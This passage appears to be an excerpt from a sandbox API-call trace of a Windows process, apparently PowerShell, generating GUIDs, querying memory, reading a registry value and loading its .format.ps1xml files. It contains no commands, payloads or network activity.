	[0347.608] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x6b9b3006, Data2=0x5eba, Data3=0x4ae8, Data4=([0]=0x88, [1]=0xfc, [2]=0xca, [3]=0xbb, [4]=0x45, [5]=0x5c, [6]=0x4d, [7]=0xc7))) returned 0x0
	[0347.608] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.608] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.608] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x99df6b59, Data2=0xb8, Data3=0x48c1, Data4=([0]=0xa9, [1]=0xfb, [2]=0xfa, [3]=0x63, [4]=0xdf, [5]=0xe3, [6]=0x2f, [7]=0xf2))) returned 0x0
	[0347.609] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x504ac58c, Data2=0xba7e, Data3=0x4b7d, Data4=([0]=0x9d, [1]=0xfa, [2]=0xda, [3]=0xaf, [4]=0xd1, [5]=0x68, [6]=0x18, [7]=0x90))) returned 0x0
	[0347.609] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x412ed603, Data2=0x8246, Data3=0x4bad, Data4=([0]=0xb3, [1]=0x16, [2]=0x7f, [3]=0x18, [4]=0x87, [5]=0xf8, [6]=0x6f, [7]=0xf3))) returned 0x0
	[0347.609] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x6b6ca44e, Data2=0x7688, Data3=0x42fe, Data4=([0]=0x9a, [1]=0x67, [2]=0x15, [3]=0xc1, [4]=0x81, [5]=0xda, [6]=0x6b, [7]=0x4f))) returned 0x0
	[0347.609] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.609] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xafc34441, Data2=0x7c6, Data3=0x4d4f, Data4=([0]=0x8d, [1]=0xc0, [2]=0x68, [3]=0xe8, [4]=0x9b, [5]=0xc5, [6]=0x3a, [7]=0xf2))) returned 0x0
	[0347.609] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.610] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.610] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.610] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.610] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.610] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x49d1cbe6, Data2=0xa1e0, Data3=0x4832, Data4=([0]=0x80, [1]=0xac, [2]=0x51, [3]=0x3e, [4]=0xb3, [5]=0x84, [6]=0x19, [7]=0xa7))) returned 0x0
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xe60f5eb5, Data2=0xa5d3, Data3=0x4b84, Data4=([0]=0x8e, [1]=0x5c, [2]=0x68, [3]=0xf, [4]=0x75, [5]=0x4, [6]=0x15, [7]=0x9a))) returned 0x0
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xf68fae7c, Data2=0xedad, Data3=0x488d, Data4=([0]=0x93, [1]=0xf5, [2]=0xb7, [3]=0xe1, [4]=0x2f, [5]=0x47, [6]=0x3f, [7]=0x37))) returned 0x0
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x6496c024, Data2=0xaf7b, Data3=0x42b0, Data4=([0]=0xa1, [1]=0xce, [2]=0x1d, [3]=0x1, [4]=0x71, [5]=0x93, [6]=0xdd, [7]=0xd0))) returned 0x0
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x7cbdcec9, Data2=0x5e98, Data3=0x45b8, Data4=([0]=0xaa, [1]=0x50, [2]=0xea, [3]=0x67, [4]=0x82, [5]=0x3e, [6]=0x45, [7]=0xb3))) returned 0x0
	[0347.611] VirtualQuery (in: lpAddress=0xac100, lpBuffer=0xacfc0, dwLength=0x30 | out: lpBuffer=0xacfc0*(BaseAddress=0xac000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x93b1a734, Data2=0xb789, Data3=0x4760, Data4=([0]=0x9c, [1]=0x61, [2]=0x95, [3]=0xb5, [4]=0x20, [5]=0xae, [6]=0xd0, [7]=0x13))) returned 0x0
	[0347.611] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x416d673a, Data2=0xadc4, Data3=0x4e06, Data4=([0]=0x87, [1]=0x89, [2]=0xc1, [3]=0x18, [4]=0xe8, [5]=0x11, [6]=0x6e, [7]=0x5f))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x8362ef84, Data2=0x7262, Data3=0x4464, Data4=([0]=0x82, [1]=0xb3, [2]=0x36, [3]=0xf9, [4]=0x54, [5]=0xd7, [6]=0x7d, [7]=0x1f))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xcaa75094, Data2=0xa97e, Data3=0x495b, Data4=([0]=0xb6, [1]=0x9e, [2]=0x4e, [3]=0x25, [4]=0x5e, [5]=0x46, [6]=0xa1, [7]=0xbc))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x33bb007d, Data2=0x57ea, Data3=0x4093, Data4=([0]=0x92, [1]=0x0, [2]=0xec, [3]=0x18, [4]=0x4, [5]=0x7c, [6]=0xdf, [7]=0xf2))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x5bce952e, Data2=0x5ffe, Data3=0x44c4, Data4=([0]=0xbb, [1]=0x20, [2]=0x74, [3]=0x65, [4]=0xf5, [5]=0xf9, [6]=0x15, [7]=0x2e))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4dfe4103, Data2=0xd46a, Data3=0x49ce, Data4=([0]=0xb3, [1]=0xc6, [2]=0x2c, [3]=0x7a, [4]=0xc9, [5]=0x25, [6]=0x21, [7]=0xe2))) returned 0x0
	[0347.612] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x936d9180, Data2=0xe90b, Data3=0x44f6, Data4=([0]=0xa7, [1]=0x24, [2]=0x97, [3]=0xfd, [4]=0xd, [5]=0x82, [6]=0x44, [7]=0x16))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x827c09d, Data2=0x2337, Data3=0x40ef, Data4=([0]=0xab, [1]=0x38, [2]=0xa5, [3]=0x5e, [4]=0x64, [5]=0xa1, [6]=0xeb, [7]=0x8))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x6be8a202, Data2=0x598d, Data3=0x4d62, Data4=([0]=0xb9, [1]=0xa2, [2]=0xcf, [3]=0xbe, [4]=0x7, [5]=0x77, [6]=0xc0, [7]=0xb8))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x31bf92d5, Data2=0x8c80, Data3=0x44e7, Data4=([0]=0x93, [1]=0x21, [2]=0xd1, [3]=0x9d, [4]=0x27, [5]=0x16, [6]=0xb1, [7]=0xed))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd1809db6, Data2=0xba91, Data3=0x476a, Data4=([0]=0x8a, [1]=0xf, [2]=0x2d, [3]=0xe5, [4]=0x51, [5]=0x8e, [6]=0x29, [7]=0xa1))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x1f227b55, Data2=0x3adb, Data3=0x4ab3, Data4=([0]=0xbd, [1]=0xa0, [2]=0xf, [3]=0x5a, [4]=0x5a, [5]=0xca, [6]=0x7d, [7]=0x73))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa43ce1ab, Data2=0xe821, Data3=0x44aa, Data4=([0]=0x9c, [1]=0xc1, [2]=0xd6, [3]=0x4, [4]=0x5e, [5]=0xa6, [6]=0xa3, [7]=0x10))) returned 0x0
	[0347.613] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x1b853334, Data2=0xe18c, Data3=0x4088, Data4=([0]=0x94, [1]=0xe5, [2]=0x7d, [3]=0x12, [4]=0xd3, [5]=0x33, [6]=0x1a, [7]=0x16))) returned 0x0
	[0347.614] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x838f0003, Data2=0xd779, Data3=0x4522, Data4=([0]=0x8a, [1]=0xe9, [2]=0x39, [3]=0x73, [4]=0x1f, [5]=0x43, [6]=0xc3, [7]=0xfe))) returned 0x0
	[0347.614] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa486a00, Data2=0xb484, Data3=0x40fb, Data4=([0]=0xb3, [1]=0xc5, [2]=0xe0, [3]=0xe2, [4]=0xec, [5]=0x43, [6]=0x1e, [7]=0x2))) returned 0x0
	[0347.614] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x3377d48e, Data2=0xb077, Data3=0x40b6, Data4=([0]=0x82, [1]=0x3a, [2]=0xa6, [3]=0x70, [4]=0xf5, [5]=0x7e, [6]=0xd3, [7]=0x3a))) returned 0x0
	[0347.614] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xe75c5c02, Data2=0x9d5d, Data3=0x45c0, Data4=([0]=0x8c, [1]=0x85, [2]=0xdd, [3]=0x8a, [4]=0x7c, [5]=0x17, [6]=0x6, [7]=0xa1))) returned 0x0
	[0347.614] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.615] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.615] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0347.616] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xa87954e9, Data2=0x2808, Data3=0x40c9, Data4=([0]=0x88, [1]=0xed, [2]=0xc6, [3]=0x1, [4]=0x57, [5]=0xb0, [6]=0xc9, [7]=0xee))) returned 0x0
	[0347.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.616] SetErrorMode (uMode=0x1) returned 0x1
	[0347.616] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0347.617] GetFileType (hFile=0x328) returned 0x1
	[0347.617] SetErrorMode (uMode=0x1) returned 0x1
	[0347.617] GetFileType (hFile=0x328) returned 0x1
	[0347.617] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.618] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.618] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.619] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.619] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.619] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.620] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x119, lpOverlapped=0x0) returned 1
	[0347.620] ReadFile (in: hFile=0x328, lpBuffer=0x366ba40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x366ba40*, lpNumberOfBytesRead=0xad1d8*=0x0, lpOverlapped=0x0) returned 1
	[0347.620] CloseHandle (hObject=0x328) returned 1
	[0347.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.620] SetErrorMode (uMode=0x1) returned 0x1
	[0347.620] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad180 | out: lpFileInformation=0xad180*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0347.620] SetErrorMode (uMode=0x1) returned 0x1
	[0347.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad268 | out: phkResult=0xad268*=0x328) returned 0x0
	[0347.621] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1ec, lpData=0x0, lpcbData=0xad1e8*=0x0 | out: lpType=0xad1ec*=0x1, lpData=0x0, lpcbData=0xad1e8*=0x56) returned 0x0
	[0347.621] CoTaskMemAlloc (cb=0x5a) returned 0x27d1c0
	[0347.621] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad1bc, lpData=0x27d1c0, lpcbData=0xad1b8*=0x56 | out: lpType=0xad1bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad1b8*=0x56) returned 0x0
	[0347.621] CoTaskMemFree (pv=0x27d1c0) 
	[0347.621] RegCloseKey (hKey=0x328) returned 0x0
	[0347.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xaceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0347.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.623] VirtualQuery (in: lpAddress=0xabd00, lpBuffer=0xacbc0, dwLength=0x30 | out: lpBuffer=0xacbc0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.623] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xd06e692, Data2=0x8e36, Data3=0x4ad2, Data4=([0]=0x87, [1]=0x83, [2]=0x2f, [3]=0xa2, [4]=0x1f, [5]=0xbb, [6]=0xb3, [7]=0x20))) returned 0x0
	[0347.624] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.624] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x566be555, Data2=0x2ec5, Data3=0x45f6, Data4=([0]=0xae, [1]=0xc2, [2]=0xcf, [3]=0x8d, [4]=0x63, [5]=0x70, [6]=0xa4, [7]=0xce))) returned 0x0
	[0347.624] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xda670ed1, Data2=0x82a8, Data3=0x49a6, Data4=([0]=0xb2, [1]=0xee, [2]=0xed, [3]=0x4d, [4]=0x67, [5]=0x69, [6]=0x5c, [7]=0x57))) returned 0x0
	[0347.624] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x3927c661, Data2=0x6f32, Data3=0x4e62, Data4=([0]=0x80, [1]=0x76, [2]=0x7b, [3]=0xa5, [4]=0x31, [5]=0xf5, [6]=0x7c, [7]=0x55))) returned 0x0
	[0347.624] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.625] VirtualQuery (in: lpAddress=0xabe40, lpBuffer=0xacd00, dwLength=0x30 | out: lpBuffer=0xacd00*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0347.625] SetErrorMode (uMode=0x1) returned 0x1
	[0347.625] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0347.625] GetFileType (hFile=0x328) returned 0x1
	[0347.625] SetErrorMode (uMode=0x1) returned 0x1
	[0347.625] GetFileType (hFile=0x328) returned 0x1
	[0347.625] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.627] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.627] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.627] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.628] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.628] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.628] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.628] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.629] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.629] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.630] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.630] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.630] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.630] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.631] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
	[0347.631] ReadFile (in: hFile=0x328, lpBuffer=0x36c7be0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad1d8, lpOverlapped=0x0 | out: lpBuffer=0x36c7be0*, lpNumberOfBytesRead=0xad1d8*=0x1000, lpOverlapped=0x0) returned 1
